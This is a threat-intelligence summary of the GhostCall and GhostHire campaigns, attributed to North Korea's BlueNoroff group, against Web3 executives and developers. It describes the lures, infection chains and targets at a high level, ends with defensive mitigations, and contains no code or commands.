Full Report
Threat actors tied to North Korea have been observed targeting the Web3 and blockchain sectors as part of twin campaigns tracked as GhostCall and GhostHire. According to Kaspersky, the campaigns are part of a broader operation called SnatchCrypto that has been underway since at least 2017. The activity is attributed to a Lazarus Group sub-cluster called BlueNoroff, which is also known as APT38,
Analysis Summary
# Threat Actor: BlueNoroff (Lazarus Group Sub-cluster)
## Attribution & Identity
* **Primary Attribution:** Threat actors tied to North Korea.
* **Known Aliases/Associated Groups:** Lazarus Group sub-cluster, APT38, CageyChameleon, CryptoCore, Genie Spider, Nickel Gladstone, Sapphire Sleet (formerly Copernicium), and Stardust Chollima.
## Activity Summary
* **Broader Operation:** Part of the larger **SnatchCrypto** operation, active since at least 2017.
* **Recent Campaigns (Twin Campaigns):** **GhostCall** and **GhostHire**, specifically targeting the Web3 and blockchain sectors. Kaspersky has tracked these since April 2025.
* **GhostCall Activity:** Assessed to be active since mid-2023, possibly succeeding the **RustBucket** campaign. Recently observed pivoting from Zoom-based social engineering to Microsoft Teams.
* **GhostHire Activity:** Focuses on tricking Web3 developers via Telegram.
## Tactics, Techniques & Procedures
* **Social Engineering & Lures:**
* **GhostCall:** Targeting executives via Telegram, luring them to investment-related meetings hosted on Zoom-like phishing websites. Uses genuine recordings of other victims rather than deepfakes during initial interaction.
* **GhostHire:** Approaching developers on Telegram to complete a time-sensitive skill assessment (30 minutes) via a booby-trapped GitHub repository.
* **Infection Mechanism (macOS Focus - GhostCall):**
* Victims are prompted to "Update Now" on the fake meeting page, leading to the download of a malicious AppleScript file.
* The script leads to the deployment of infection chains.
* **Infection Mechanism (Windows Focus - GhostCall):**
* Leverages the **ClickFix technique** to copy and run a PowerShell command.
* **Persistence/Tracking:** Every interaction on the fake site is recorded and beaconed to the attackers.
* **Historical TTP Pivot:** The move to targeting macOS systems follows the **RustBucket** campaign.
## Targeting
* **Sectors:** Web3 and blockchain sectors. Tech companies and the venture capital sector (executives targeted via GhostCall).
* **Geography:**
* **GhostCall Victims:** Japan, Italy, France, Singapore, Turkey, Spain, Sweden, India, and Hong Kong.
* **GhostHire Major Hunting Grounds:** Japan and Australia.
* **Victims:**
* Executives at tech companies and VC firms (GhostCall).
* Web3 developers (GhostHire).
## Tools & Infrastructure
* **Malware Families:**
* Associated with previous macOS malware families like **KANDYKORN**, **ObjCShellz**, and **TodoSwift**.
* **Infrastructure:**
* Utilizes platforms for initial contact (Telegram).
* Employs fake Zoom/Teams-like meeting interfaces and phishing websites.
* Uses malicious GitHub repositories for code delivery (**GhostHire**).
* Delivers payloads via downloaded malicious ZIP files and scripts (AppleScript).
## Implications
BlueNoroff/Lazarus has demonstrated a sustained, multi-year effort (since 2017) to monetize through cyber espionage and theft, with a recent, significant focus on the lucrative Web3/crypto ecosystem. Their pivot to sophisticated social engineering targeting macOS users (executives and developers) via platforms like Telegram indicates a targeted and adaptable approach to high-value breaches, utilizing fake professional scenarios (meetings, skill assessments) to facilitate initial access.
## Mitigations
* **User Training:** Critical awareness training focused on social engineering tactics using perceived professional needs (meeting links, software updates).
* **Platform Vigilance:** Specific vigilance regarding unsolicited requests for software updates via video conferencing platforms (Zoom/Teams) or SDK prompts, especially after joining an unknown call.
* **Code Execution Control:** Implement strict policies regarding the execution of scripts or code downloaded from external links, GitHub repositories, or unexpected sources, particularly for developers reviewing third-party code.
* **Endpoint Security:** Ensure macOS and Windows endpoints have robust security monitoring capable of detecting anomalous AppleScript execution or PowerShell command chaining associated with the ClickFix technique.